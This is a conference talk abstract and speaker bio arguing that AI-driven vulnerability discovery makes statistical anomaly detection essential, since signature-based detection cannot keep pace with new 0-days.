2026-05-16 –, Track 1
AI models like Mythos are finding exploitable vulnerabilities faster than the industry can disclose, patch, or write signatures for them. The inevitable consequence: a flood of 0-days in the wild. Every signature-based detection you own is, by definition, blind to them. This talk makes the case that statistical anomaly detection is no longer an optional "ML in security" side quest. It's the only class of detection that can catch the exploitation of things nobody knows exist yet. Drawing on production experience building ML detection, we'll cover what works, what doesn't, and why your UEBA tab isn't going to save you.
Detection engineering has always been a race: find a vuln, reverse the exploit, write a signature, push it out, hope you beat the attackers. That race was losing even before automation. With AI-driven vulnerability discovery, the race is over. The discovery rate is about to dwarf the signature-authoring rate by orders of magnitude, and a meaningful fraction of those findings will be weaponised before any defender has them.
That leaves one brute mathematical fact: you cannot write a signature for something you don't know exists. The only detection strategy that survives this world is one that looks for the effects of exploitation rather than its fingerprints. Statistical anomaly detection.
In this talk we'll cover:
The supply-side economics of AI vuln discovery, and why 0-day proliferation is structurally inevitable rather than speculative
Why signature-based detection breaks down in this regime, with numbers
What "anomaly detection" actually means (time-series, graph, distribution-based), and the crucial distinctions most vendors blur
Real examples: detections that caught novel behaviour in production vs. the ones that generated 400 alerts a day
The analyst UX problem: explainability, triage, and why most ML detections die in the SOC
A pragmatic starting point for teams without a PhD on staff
This is a hardened follow-up to a talk given at Cyber Scotland Connect in 2025, updated for a world where vulnerability discovery itself has been automated.
I'm a detection engineer based in Glasgow and a former Principal Security Engineer at Oracle. I've spent the last seven years working across banking, enterprise, and startup security teams, and currently lead detection at Alpha Level, an ML threat detection startup, alongside independent consulting work. I'm mostly drawn to the parts of security operations that don't have tidy answers yet.